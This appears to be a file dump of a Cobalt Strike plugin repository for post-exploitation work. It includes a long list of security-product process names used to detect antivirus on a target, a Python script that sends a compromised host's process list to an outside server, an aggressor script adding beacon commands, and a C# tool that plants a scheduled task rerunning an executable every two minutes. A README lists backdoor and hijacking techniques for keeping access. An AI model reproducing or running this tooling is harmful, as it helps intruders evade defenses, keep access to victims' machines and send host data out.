$avname=@("360tray","360safe","ZhuDongFangYu","360sd","a2guard","ad-watch","cleaner8","vba32lder","MongoosaGUI","CorantiControlCenter32","F-PROT","CMCTrayIcon","K7TSecurity","UnThreat","CKSoftShiedAntivirus4","AVWatchService","ArcaTasksService","iptray","PSafeSysTray","nspupsvc","SpywareTerminatorShield","BKavService","MsMpEng","SBAMSvc","ccSvcHst","f-secure","avp","KvMonXP","RavMonD","Mcshield","Tbmon","Frameworkservice","egui","ekrn","eguiProxy","kxetray","knsdtray","TMBMSRV","avcenter","avguard","avgnt","sched","ashDisp","rtvscan","ccapp","NPFMntor","ccSetMgr","ccRegVfy","vptray","ksafe","QQPCRTP","Miner","AYAgent","patray","V3Svc","avgwdsvc","QUHLPSVC","mssecess","SavProgress","SophosUI","SophosFS","SophosHealth","SophosSafestore64","SophosCleanM","fsavgui","vsserv","remupd","FortiTray","safedog","parmor","Iparmor","beikesan","KSWebShield","TrojanHunter","GG","adam","AST","ananwidget","AVK","avg","spidernt","avgaurd","vsmon","cpf","outpost","rfwmain","kpfwtray","FYFireWall","MPMon","pfw","S","1433","DUB","ServUDaemon","BaiduSdSvc","BaiduSdTray","BaiduSd","SafeDogGuardCenter","safedogu
pdatecenter","safedogguardcenter","SafeDogSiteIIS","SafeDogTray","SafeDogServerUI","D_Safe_Manage","d_manage","yunsuo_agent_service","yunsuo_agent_daemon","HwsPanel","hws_ui","hws","hwsd","hipstray","wsctrl","usysdiag","WEBSCANX","SPHINX","bddownloader","baiduansvx","AvastUI","emet_agent","emet_service","firesvc","firetray","hipsvc","mfevtps","mcafeefire","scan32","shstat","vstskmgr","engineserver","mfeann","mcscript","updaterui","udaterui","naprdmgr","cleanup","cmdagent","frminst","mcscript_inuse","mctray","AAWTray","Ad-Aware","MSASCui","_avp32","_avpcc","_avpm","aAvgApi","ackwin32","adaware","advxdwin","agentsvr","agentw","alertsvc","alevir","alogserv","amon9x","anti-trojan","antivirus","ants","apimonitor","aplica32","apvxdwin","arr","atcon","atguard","atro55en","atupdater","atwatch","au","aupdate","auto-protect.nav80try","autodown","autotrace","autoupdate","avconsol","ave32","avgcc32","avgctrl","avgemc","avgrsx","avgserv","avgserv9","avgw","avkpop","avkserv","avkservice","avkwctl9","avltmain","avnt","avp32","avpcc","avpdos32","avpm","avptc32","avpupd","avsched32","avsynmgr","avwin","avwin95","avwinnt","avwupd","avwupd32","avwupsrv","avxmonitor9x","avxmonitornt","avxquar","backweb","bargains","bd_professional","beagle","belt","bidef","bidserver","bipcp","bipcpevalsetup","bisp","blackd","blackice","blink","blss","bootconf","bootwarn","borg2","bpc","brasil","bs120","bundle","bvt","ccevtmgr","ccpxysvc","cdp","cfd","cfgwiz","cfiadmin","cfiaudit","cfinet","cfinet32","claw95","claw95cf","clean","cleaner","cleaner3","cleanpc","click","cmesys","cmgrdian","cmon016","connectionmonitor","cpd","cpf9x206","cpfnt206","ctrl","cv","cwnb181","cwntdwmo","datemanager","dcomx","defalert","defscangui","defwatch","deputy","divx","dllcache","dllreg","doors","dpf","dpfsetup","dpps2","drwatson","drweb32","drwebupw","dssagent","dvp95","dvp95_0","ecengine","efpeadm","emsw","ent","esafe","escanhnt","escanv95","espwatch","ethereal","etrustcipe","evpn","exantivirus-cnet","exe.avxw","expert","e
xplore","f-agnt95","f-prot95","f-stopw","fameh32","fast","fch32","fih32","findviru","firewall","fnrb32","fp-win","fp-win_trial","fprot","frw","fsaa","fsav","fsav32","fsav530stbyb","fsav530wtbyb","fsav95","fsgk32","fsm32","fsma32","fsmb32","gator","gbmenu","gbpoll","generics","gmt","guard","guarddog","hacktracersetup","hbinst","hbsrv","hotactio","hotpatch","htlog","htpatch","hwpe","hxdl","hxiul","iamapp","iamserv","iamstats","ibmasn","ibmavsp","icload95","icloadnt","icmon","icsupp95","icsuppnt","idle","iedll","iedriver","iface","ifw2000","inetlnfo","infus","infwin","init","intdel","intren","iomon98","istsvc","jammer","jdbgmrg","jedi","kavlite40eng","kavpers40eng","kavpf","kazza","keenvalue","kerio-pf-213-en-win","kerio-wrl-421-en-win","kerio-wrp-421-en-win","kernel32","killprocesssetup161","launcher","ldnetmon","ldpro","ldpromenu","ldscan","lnetinfo","loader","localnet","lockdown","lockdown2000","lookout","lordpe","lsetup","luall","luau","lucomserver","luinit","luspt","mapisvc32","mcagent","mcmnhdlr","mctool","mcupdate","mcvsrte","mcvsshld","md","mfin32","mfw2en","mfweng3.02d30","mgavrtcl","mgavrte","mghtml","mgui","minilog","mmod","monitor","moolive","mostat","mpfagent","mpfservice","mpftray","mrflux","msapp","msbb","msblast","mscache","msccn32","mscman","msconfig","msdm","msdos","msiexec16","msinfo32","mslaugh","msmgt","msmsgri32","mssmmc32","mssys","msvxd","mu0311ad","mwatch","n32scanw","nav","navap.navapsvc","navapsvc","navapw32","navdx","navlu32","navnt","navstub","navw32","navwnt","nc2000","ncinst4","ndd32","neomonitor","neowatchlog","netarmor","netd32","netinfo","netmon","netscanpro","netspyhunter-1.2","netstat","netutils","nisserv","nisum","nmain","nod32","normist","norton_internet_secu_3.0_407","notstart","npf40_tw_98_nt_me_2k","npfmessenger","nprotect","npscheck","npssvc","nsched32","nssys32","nstask32","nsupdate","nt","ntrtscan","ntvdm","ntxconfig","nui","nupgrade","nvarch16","nvc95","nvsvc32","nwinst4","nwservice","nwtool16","ollydbg","onsrvr","optimize",
"ostronet","otfix","outpostinstall","outpostproinstall","padmin","panixk","patch","pavcl","pavproxy","pavsched","pavw","pccwin98","pcfwallicon","pcip10117_0","pcscan","pdsetup","periscope","persfw","perswf","pf2","pfwadmin","pgmonitr","pingscan","platin","pop3trap","poproxy","popscan","portdetective","portmonitor","powerscan","ppinupdt","pptbc","ppvstop","prizesurfer","prmt","prmvr","procdump","processmonitor","procexplorerv1.0","programauditor","proport","protectx","pspf","purge","qconsole","qserver","rapapp","rav7","rav7win","rav8win32eng","ray","rb32","rcsync","realmon","reged","regedit","regedt32","rescue","rescue32","rrguard","rshell","rtvscn95","rulaunch","run32dll","rundll","rundll16","ruxdll32","safeweb","sahagentscan32","save","savenow","sbserv","sc","scam32","scan95","scanpm","scrscan","serv95","setup_flowprotector_us","setupvameeval","sfc","sgssfw32","sh","shellspyinstall","shn","showbehind","smc","sms","smss32","soap","sofi","sperm","spf","spoler","spoolcv","spoolsv32","spyxx","srexe","srng","ss3edit","ssg_4104","ssgrate","st2","start","stcloader","supftrl","support","supporter5","svchostc","svchosts","sweep95","sweepnet.sweepsrv.sys.swnetsup","symproxysvc","symtray","sysedit","sysupd","taskmg","taskmo","taumon","tbscan","tc","tca","tcm","tds-3","tds2-98","tds2-nt","teekids","tfak","tfak5","tgbob","titanin","titaninxp","tracert","trickler","trjscan","trjsetup","trojantrap3","tsadbot","tvmd","tvtmd","undoboot","updat","update","upgrad","utpost","vbcmserv","vbcons","vbust","vbwin9x","vbwinntw","vcsetup","vet32","vet95","vettray","vfsetup","vir-help","virusmdpersonalfirewall","vnlan300","vnpc3000","vpc32","vpc42","vpfw30s","vscan40","vscenu6.02d30","vsched","vsecomr","vshwin32","vsisetup","vsmain","vsstat","vswin9xe","vswinntse","vswinperse","w32dsm89","w9x","watchdog","webdav","webtrap","wfindv32","whoswatchingme","wimmun32","win-bugsfix","win32","win32us","winactive","window","windows","wininetd","wininitx","winlogin","winmain","winnet","winppr32","winrec
on","winservn","winssk32","winstart","winstart001","wintsk32","winupdate","wkufind","wnad","wnt","wradmin","wrctrl","wsbgate","wupdater","wupdt","wyvernworksfirewall","xpf202en","zapro","zapsetup3001","zatutor","zonalm2601","zonealarm","AVPM","A2CMD","A2SERVICE","A2FREE","ADVCHK","AGB","AKRNL","AHPROCMONSERVER","AIRDEFENSE","ALERTSVC","AVIRA","AMON","TROJAN","AVZ","ANTIVIR","APVXDWIN","ARMOR2NET","ASHexe","ASHENHCD","ASHMAISV","ASHPOPWZ","ASHSERV","ASHSIMPL","ASHSKPCK","ASHWEBSV","ASWUPDSV","ASWSCAN","AVCIMAN","AVCONSOL","AVENGINE","AVESVC","AVEVAL","AVEVL32","AVGAM","AVGCC","AVGCHSVX","AVGCSRVX","AVGNSX","AVGCC32","AVGCTRL","AVGEMC","AVGFWSRV","AVGNTMGR","AVGSERV","AVGTRAY","AVGUPSVC","AVINITNT","AVKSERV","AVKSERVICE","AVKWCTL","AVP32","AVPCC","AVSERVER","AVSCHED32","AVSYNMGR","AVWUPD32","AVWUPSRV","AVXMONITOR","AVXQUAR","BDSWITCH","BLACKD","BLACKICE","CAFIX","BITDEFENDER","CCEVTMGR","CFP","CFPCONFIG","CFIAUDIT","CLAMTRAY","CLAMWIN","CUREIT","DEFWATCH","DRVIRUS","DRWADINS","DRWEB","DEFENDERDAEMON","DWEBLLIO","DWEBIO","ESCANH95","ESCANHNT","EWIDOCTRL","EZANTIVIRUSREGISTRATIONCHECK","F-AGNT95","FAMEH32","FILEMON","FIREWALL","FORTICLIENT","FORTISCAN","FPAVSERVER","FPROTTRAY","FPWIN","FRESHCLAM","FSAV32","FSBWSYS","F-SCHED","FSDFWD","FSGK32","FSGK32ST","FSGUIEXE","FSMA32","FSMB32","FSPEX","FSSM32","F-STOPW","GCASDTSERV","GCASSERV","GIANTANTISPYWARE","GUARDGUI","GUARDNT","GUARDXSERVICE","GUARDXKICKOFF","HREGMON","HRRES","HSOCKPE","HUPDATE","IAMAPP","IAMSERV","ICLOAD95","ICLOADNT","ICMON","ICSSUPPNT","ICSUPP95","ICSUPPNT","INETUPD","INOCIT","INORPC","INORT","INOTASK","INOUPTNG","IOMON98","ISAFE","ISATRAY","KAV","KAVMM","KAVPF","KAVPFW","KAVSTART","KAVSVC","KAVSVCUI","KMAILMON","MAMUTU","MCAGENT","MCMNHDLR","MCREGWIZ","MCUPDATE","MCVSSHLD","MINILOG","MYAGTSVC","MYAGTTRY","NAVAPSVC","NAVAPW32","NAVLU32","NAVW32","NEOWATCHLOG","NEOWATCHTRAY","NISSERV","NISUM","NMAIN","NOD32","NORMIST","NOTSTART","NPAVTRAY","NPFMSG","NPROTECT","NSCHED32","NSMDTR","NSSSERV","NSSTRAY","NTRTSCA
N","NTOS","NTXCONFIG","NUPGRADE","NVCOD","NVCTE","NVCUT","NWSERVICE","OFCPFWSVC","ONLINENT","OPSSVC","OP_MON","PAVFIRES","PAVFNSVR","PAVKRE","PAVPROT","PAVPROXY","PAVPRSRV","PAVSRV51","PAVSS","PCCGUIDE","PCCIOMON","PCCNTMON","PCCPFW","PCCTLCOM","PCTAV","PERSFW","PERTSK","PERVAC","PESTPATROL","PNMSRV","PREVSRV","PREVX","PSIMSVC","QHONLINE","QHONSVC","QHWSCSVC","QHSET","RTVSCN95","SALITY","SAPISSVC","SCANWSCS","SAVADMINSERVICE","SAVMAIN","SAVSCAN","SCANNINGPROCESS","SDRA64","SDHELP","SHSTAT","SITECLI","SPBBCSVC","SPIDERCPL","SPIDERML","SPIDERUI","SPYBOTSD","SPYXX","SS3EDIT","STOPSIGNAV","SWAGENT","SWDOCTOR","SWNETSUP","SYMLCSVC","SYMPROXYSVC","SYMSPORT","SYMWSC","SYNMGR","TAUMON","TMLISTEN","TMNTSRV","TMPROXY","TNBUTIL","TRJSCAN","VBA32ECM","VBA32IFS","VBA32LDR","VBA32PP3","VBSNTW","VCRMON","VRFWSVC","VRMONNT","VRMONSVC","VRRW32","VSECOMR","VSHWIN32","VSSTAT","WATCHDOG","WINSSNOTIFY","WRCTRL","XCOMMSVR","ZLCLIENT","ZONEALARM","360rp","afwServ","safeboxTray","360safebox","QQPCTray","KSafeTray","KSafeSvc","KWatch","gov_defence_service","gov_defence_daemon"); 3 | $tasklist=Get-Process | select-object Id,ProcessName,Path 4 | for($count=0;$count -lt $tasklist.Count;$count++){ 5 | if($avname.IndexOf($tasklist[$count].ProcessName) -ne -1){ 6 | $text=-Join("PID:",$tasklist[$count].Id,"|","ProcessName:",$tasklist[$count].ProcessName,"|","Path:",$tasklist[$count].Path) 7 | write-host $text 8 | } 9 | } 10 | 11 | Write-Host "" 12 | Write-Host "Wmic Query" 13 | wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct 14 | } -------------------------------------------------------------------------------- /杀毒检测/check.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib.parse 3 | import sys 4 | import os 5 | import re 6 | from bs4 import BeautifulSoup 7 | 8 | def process_check(argv): 9 | cwd=argv[2] 10 | open(os.path.join(cwd, "result_process.txt"), "w", encoding="utf-8") 11 | 
processlist=argv[1].replace("RaidEnMei41300000000000000000000000","\r\n") 12 | print(processlist) 13 | tmp=[] 14 | result="" 15 | url="http://42.193.251.15/tasklist.php" 16 | headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36","Content-Type":"application/x-www-form-urlencoded"} 17 | rqt=requests.post(url=url,headers=headers,data="avlist={}".format(urllib.parse.quote(processlist)),verify=False) 18 | html=BeautifulSoup(rqt.text,"html.parser") 19 | tdlist=html.find_all("td") 20 | for td in tdlist: 21 | tmp.append(td.get_text()) 22 | if len(tmp)==2: 23 | find_pid=re.findall("{}.*".format(tmp[0]),processlist) 24 | pid=find_pid[0].split(" ")[1] 25 | result += "{} {} PID:{}".format(tmp[0], tmp[1],pid) 26 | tmp=[] 27 | print(result,file=open(os.path.join(cwd,"result_process.txt"),"a",encoding="utf-8")) 28 | print(result) 29 | 30 | if __name__ == '__main__': 31 | process_check(sys.argv) -------------------------------------------------------------------------------- /杀毒检测/list.txt: -------------------------------------------------------------------------------- 1 | 360安全卫士=>360tray.exe 2 | 360杀毒=>360sd.exe 3 | a-squared杀毒=>a2guard.exe 4 | Lavasoft杀毒=>ad-watch.exe 5 | The Cleaner杀毒=>cleaner8.exe 6 | vb32杀毒=>vba32lder.exe 7 | Mongoosa杀毒=>MongoosaGUI.exe 8 | Coranti2012杀毒=>CorantiControlCenter32.exe 9 | F-PROT杀毒=>F-PROT.EXE 10 | CMC杀毒=>CMCTrayIcon.exe 11 | K7杀毒=>K7TSecurity.exe 12 | UnThreat杀毒=>UnThreat.exe 13 | Shield Antivirus杀毒=>CKSoftShiedAntivirus4.exe 14 | VIRUSfighter杀毒=>AVWatchService.exe 15 | ArcaVir杀毒=>ArcaTasksService.exe 16 | Immunet杀毒=>iptray.exe 17 | PSafe杀毒=>PSafeSysTray.exe 18 | nProtect杀毒=>nspupsvc.exe 19 | SpywareTerminator杀毒=>SpywareTerminatorShield.exe 20 | Bkav杀毒=>BKavService.exe 21 | Microsoft Security Essentials=>MsMpEng.exe 22 | VIPRE=>SBAMSvc.exe 23 | Norton杀毒=>ccSvcHst.exe 24 | 冰岛=>f-secure.exe 25 | 卡巴斯基=>avp.exe 26 | 江民杀毒=>KvMonXP.exe 27 | 瑞星杀毒=>RavMonD.exe 28 | 
麦咖啡=>Mcshield.exe 29 | NOD32=>egui.exe 30 | 金山毒霸=>kxetray.exe 31 | 可牛杀毒=>knsdtray.exe 32 | Avira(小红伞)=>avcenter.exe 33 | Avast网络安全=>ashDisp.exe 34 | 诺顿杀毒=>rtvscan.exe 35 | 金山卫士=>ksafe.exe 36 | QQ电脑管家=>QQPCRTP.exe 37 | 流量矿石=>Miner.exe 38 | 韩国胶囊=>AYAgent.aye 39 | 安博士=>patray.exe 40 | 安博士V3=>V3Svc.exe 41 | AVG杀毒=>avgwdsvc.exe 42 | 赛门铁克=>ccSetMgr.exe 43 | QUICK HEAL杀毒=>QUHLPSVC.EXE 44 | 微软杀毒=>mssecess.exe 45 | Sophos杀毒=>SavProgress.exe 46 | F-Secure杀毒=>fsavgui.exe 47 | 比特梵德=>vsserv.exe 48 | 熊猫卫士=>remupd.exe 49 | 飞塔=>FortiTray.exe 50 | 安全狗=>safedog.exe 51 | 木马克星=>parmor.exe 52 | 贝壳云安全=>beikesan.exe 53 | 金山网盾=>KSWebShield.exe 54 | 木马猎手=>TrojanHunter.exe 55 | 巨盾网游安全盾=>GG.exe 56 | 绿鹰安全精灵=>adam.exe 57 | 超级巡警=>AST.exe 58 | 墨者安全专家=>ananwidget.exe 59 | GData=>AVK.exe 60 | Symantec Norton=>ccapp.exe 61 | AVG Anti-Virus=>avg.exe 62 | Dr.web=>spidernt.exe 63 | Mcafee=>Mcshield.exe 64 | Avira Antivir=>avgaurd.exe 65 | F-Prot AntiVirus=>F-PROT.exe 66 | ZoneAlarm=>vsmon.exe 67 | Kaspersky=>avp.exee 68 | Comodo=>cpf.exe 69 | Outpost Firewall=>outpost.exe 70 | 瑞星防火墙=>rfwmain.exe 71 | 金山网镖=>kpfwtray.exe 72 | 风云防火墙=>FYFireWall.exe 73 | 微点主动防御=>MPMon.exe 74 | 天网防火墙=>pfw.exe 75 | 发现S-U=>ServUDaemon.exe 76 | 百度杀软=>BaiduSdSvc.exe 77 | 火绒=>hipstray.exe 78 | 趋势科技=>ntrtscan.exe 79 | QQ=>QQ.exe 80 | SangforVpn(已连接上VPN)=>SangforServiceClient.exe 81 | SangforVpn=>sangforPW.exe 82 | ProcessHacker(调试机?)=>ProcessHacker.exe 83 | IDA(调试机?)=>ida.exe 84 | IDAx64(调试机?)=>ida64.exe 85 | VM虚拟机=>vmtoolsd.exe -------------------------------------------------------------------------------- /杀毒检测/process_check.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("pscheck", "" ,"用于查找list.txt里的指定进程tlick:pscheck 1 #会自动寻找指定进程所在的路径(通过调用wmic)"); 2 | beacon_command_register("xiaobaicheck", "" ,"由刨洞群的小白师傅在线进程检测提供,请求http://42.193.251.15/tasklist.php 获取返回结果"); 3 | alias pscheck { 4 | $find = $2; 5 | $fhanle = openf(script_resource("list.txt")); 6 | $fdata = 
readAll($fhanle); 7 | closef($fhanle); 8 | foreach $value ($fdata){ 9 | ($pname, $process) = split("=>", $value); 10 | %plist["$pname"] = "$process"; 11 | } 12 | bps($1, lambda({ 13 | local('$pid $name $entry'); 14 | foreach $entry (split("\n", $2)) { 15 | ($name, $null, $pid) = split("\\s+", $entry); 16 | foreach $key => $value (%plist){ 17 | if($name eq $value){ 18 | btask($1, "\cB$key $pid"); 19 | if($find eq "1"){ 20 | bshell($1, "wmic process where ProcessId=$pid get /value"); 21 | } 22 | } 23 | } 24 | } 25 | }, $callback => $2)); 26 | } 27 | 28 | alias xiaobaicheck{ 29 | btask($1, "远程请求http://42.193.251.15/tasklist.php 获取进程列表"); 30 | $text = ""; 31 | bps($1, lambda({ 32 | local('$pid $name $entry'); 33 | foreach $entry (split("\n", $2)) { 34 | ($name, $null, $pid) = split("\\s+", $entry); 35 | $text .= "$name $pid"."RaidEnMei41300000000000000000000000"; 36 | } 37 | $pypath = script_resource("check.py"); 38 | btask(1, "$pypath"); 39 | $cwd = script_resource(""); 40 | $process = exec("python $pypath \"$text\" $cwd"); 41 | @data = readAll($process); 42 | closef($process); 43 | #sleep(3 * 1000); 44 | $fhanle = openf(script_resource("result_process.txt")); 45 | $fdata = readAll($fhanle); 46 | closef($fhanle); 47 | foreach $value ($fdata){ 48 | btask($1, $value); 49 | } 50 | }, $callback => $2)); 51 | } 52 | -------------------------------------------------------------------------------- /杀毒检测/process_check.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/杀毒检测/process_check.png -------------------------------------------------------------------------------- /杀毒检测/xiaobaicheck.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/杀毒检测/xiaobaicheck.png 
-------------------------------------------------------------------------------- /权限维持/ConsoleApp1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.IO; 4 | using TaskScheduler; 5 | using System.Windows.Forms; 6 | using System.Diagnostics; 7 | 8 | 9 | namespace testschtasks 10 | { 11 | class Program 12 | { 13 | static void Main(string[] args) 14 | { 15 | string taskname = args[0]; 16 | string ostpath = args[1]; 17 | 18 | TaskSchedulerClass ts = new TaskSchedulerClass(); 19 | ts.Connect(null, null, null); 20 | ITaskFolder folder = ts.GetFolder("\\"); 21 | 22 | IRegisteredTaskCollection alltask = folder.GetTasks(1); 23 | bool isexit = false; 24 | Console.WriteLine("已存在的计划任务------>"); 25 | for (int i = 1; i < alltask.Count; i++) 26 | { 27 | Console.WriteLine(alltask[i].Name); 28 | if (alltask[i].Name.Equals(taskname)) 29 | { 30 | isexit = true; 31 | Console.WriteLine($"[Find] 指定添加的计划任务已存在:{taskname}"); 32 | break; 33 | } 34 | } 35 | 36 | if (isexit == false) 37 | { 38 | ITaskDefinition task = ts.NewTask(0); 39 | task.RegistrationInfo.Description = taskname; 40 | ITimeTrigger triger = (ITimeTrigger)task.Triggers.Create(_TASK_TRIGGER_TYPE2.TASK_TRIGGER_TIME); 41 | triger.Repetition.Interval = "PT2M"; 42 | triger.StartBoundary = DateTime.Now.ToString("yyy-MM-ddTHH:mm:ss"); 43 | IExecAction action = (IExecAction)task.Actions.Create(_TASK_ACTION_TYPE.TASK_ACTION_EXEC); 44 | action.Path = ostpath; 45 | action.Arguments = ""; 46 | IRegisteredTask regTask = folder.RegisterTaskDefinition(taskname, task, (int)_TASK_CREATION.TASK_CREATE, null, null, _TASK_LOGON_TYPE.TASK_LOGON_INTERACTIVE_TOKEN); 47 | IRunningTask runTask = regTask.Run(null); 48 | Console.WriteLine($"[+] 计划任务已添加:{taskname}"); 49 | } 50 | 51 | 52 | } 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /权限维持/README.md: 
-------------------------------------------------------------------------------- 1 | ## 信息收集 ## 2 | 功能: 3 | * usb历史记录信息收集 4 | * 判断是否存在域 5 | * 获取系统盘符 6 | * 获取已安装的软件 7 | * 系统基本信息获取 8 | * 网络信息查询 9 | * 配置查询 10 | * 用户查询 11 | * 用户组查询 12 | * netsh端口转发设置 13 | * netsh端口转发列表查询 14 | * netsh端口转发删除 15 | * 常用软件信息收集 16 | * 向日葵信息收集 17 | 18 | ## 权限维持 ## 19 | 功能: 20 | * cs自带的beacon服务马 21 | * winrm后门 22 | * msdtc DLL劫持 23 | * WmiPrvSE提权/权限维持 24 | * CacheTask任务计划COM接口劫持 (适用于:windows 10/windows 2012以上) 25 | * RID劫持 26 | * lnk快捷键劫持 27 | * java运行class文件 28 | * dnsadmin账号组进行dns.dll劫持 (适用于域) 29 | * userAccountControl将ID设置为8192作为域控(适用于域) 30 | * 以某个进程的Token运行EXE 31 | * C#添加计划任务 32 | 33 | 待开发.............. 34 | 35 | 36 | ## cs自带的beacon服务马 ## 37 | ![](img/service/Servicebeacon.png) 38 | ![](img/service/system_beacon.png) 39 | 40 | ## msdtc DLL劫持 ## 41 | ![](img/msdtc/msdtc.png) 42 | ![](img/msdtc/msdtc2.png) 43 | 44 | ## WmiPrvSE提权/权限维持 ## 45 | ![](img/WmiPrvSE/7.png) 46 | ![](img/WmiPrvSE/2008.png) 47 | 48 | ## CacheTask任务计划COM接口劫持 ## 49 | ![](img/CacheTask/CacheTask.png) 50 | ![](img/CacheTask/CacheTask2.png) 51 | ![](img/CacheTask/CacheTask.gif) 52 | 53 | ## Rid劫持 ## 54 | ![](img/rid/1.png) 55 | ![](img/rid/0.png) 56 | ![](img/rid/2.png) 57 | ![](img/rid/4.png) 58 | ![](img/rid/6.png) 59 | 60 | ## lnk快捷键劫持 ## 61 | ![](img/lnkhijack/1.png) 62 | ![](img/lnkhijack/2.png) 63 | ![](https://z3.ax1x.com/2021/10/19/5a4Ucn.gif) 64 | 65 | ## java运行class文件 ## 66 | ![](img/javarun/run.png) 67 | 68 | ## userAccountControl将ID设置为8192作为域控 ## 69 | ![](img/userAccountControl/1.png) 70 | ![](img/userAccountControl/2.png) 71 | ![](img/userAccountControl/3.png) 72 | ![](img/userAccountControl/4.png) 73 | 74 | ## 向日葵信息收集 ## 75 | ![](img/SunloginClient/SunloginClient.png) 76 | 77 | ## 以某个进程的Token运行EXE ## 78 | ![](img/tokenrun/1.png) 79 | ![](img/tokenrun/2.png) 80 | 81 | ## C#添加计划任务 ## 82 | ConsoleApp1.cs是源码,需要依赖Interop.TaskScheduler.dll。这里利用了ILMerge打包成了addtask.exe,.NET 2.0 83 | ![](img/schtasks/1.png) 84 | 
![](img/schtasks/2.png) 85 | ![](img/schtasks/3.png) 86 | -------------------------------------------------------------------------------- /权限维持/addtask.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/addtask.exe -------------------------------------------------------------------------------- /权限维持/img/CacheTask/CacheTask.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/CacheTask/CacheTask.gif -------------------------------------------------------------------------------- /权限维持/img/CacheTask/CacheTask.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/CacheTask/CacheTask.png -------------------------------------------------------------------------------- /权限维持/img/CacheTask/CacheTask2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/CacheTask/CacheTask2.png -------------------------------------------------------------------------------- /权限维持/img/SunloginClient/SunloginClient.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/SunloginClient/SunloginClient.png -------------------------------------------------------------------------------- /权限维持/img/WmiPrvSE/2008.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/WmiPrvSE/2008.png 
-------------------------------------------------------------------------------- /权限维持/img/WmiPrvSE/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/WmiPrvSE/7.png -------------------------------------------------------------------------------- /权限维持/img/javarun/run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/javarun/run.png -------------------------------------------------------------------------------- /权限维持/img/lnkhijack/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/lnkhijack/1.png -------------------------------------------------------------------------------- /权限维持/img/lnkhijack/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/lnkhijack/2.png -------------------------------------------------------------------------------- /权限维持/img/msdtc/msdtc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/msdtc/msdtc.png -------------------------------------------------------------------------------- /权限维持/img/msdtc/msdtc2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/msdtc/msdtc2.png -------------------------------------------------------------------------------- /权限维持/img/rid/0.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/rid/0.png -------------------------------------------------------------------------------- /权限维持/img/rid/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/rid/1.png -------------------------------------------------------------------------------- /权限维持/img/rid/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/rid/2.png -------------------------------------------------------------------------------- /权限维持/img/rid/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/rid/4.png -------------------------------------------------------------------------------- /权限维持/img/rid/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/rid/6.png -------------------------------------------------------------------------------- /权限维持/img/schtasks/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/schtasks/1.png -------------------------------------------------------------------------------- /权限维持/img/schtasks/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/schtasks/2.png 
-------------------------------------------------------------------------------- /权限维持/img/schtasks/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/schtasks/3.png -------------------------------------------------------------------------------- /权限维持/img/service/Servicebeacon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/service/Servicebeacon.png -------------------------------------------------------------------------------- /权限维持/img/service/system_beacon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/service/system_beacon.png -------------------------------------------------------------------------------- /权限维持/img/tokenrun/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/tokenrun/1.png -------------------------------------------------------------------------------- /权限维持/img/tokenrun/2.png: -------------------------------------------------------------------------------- 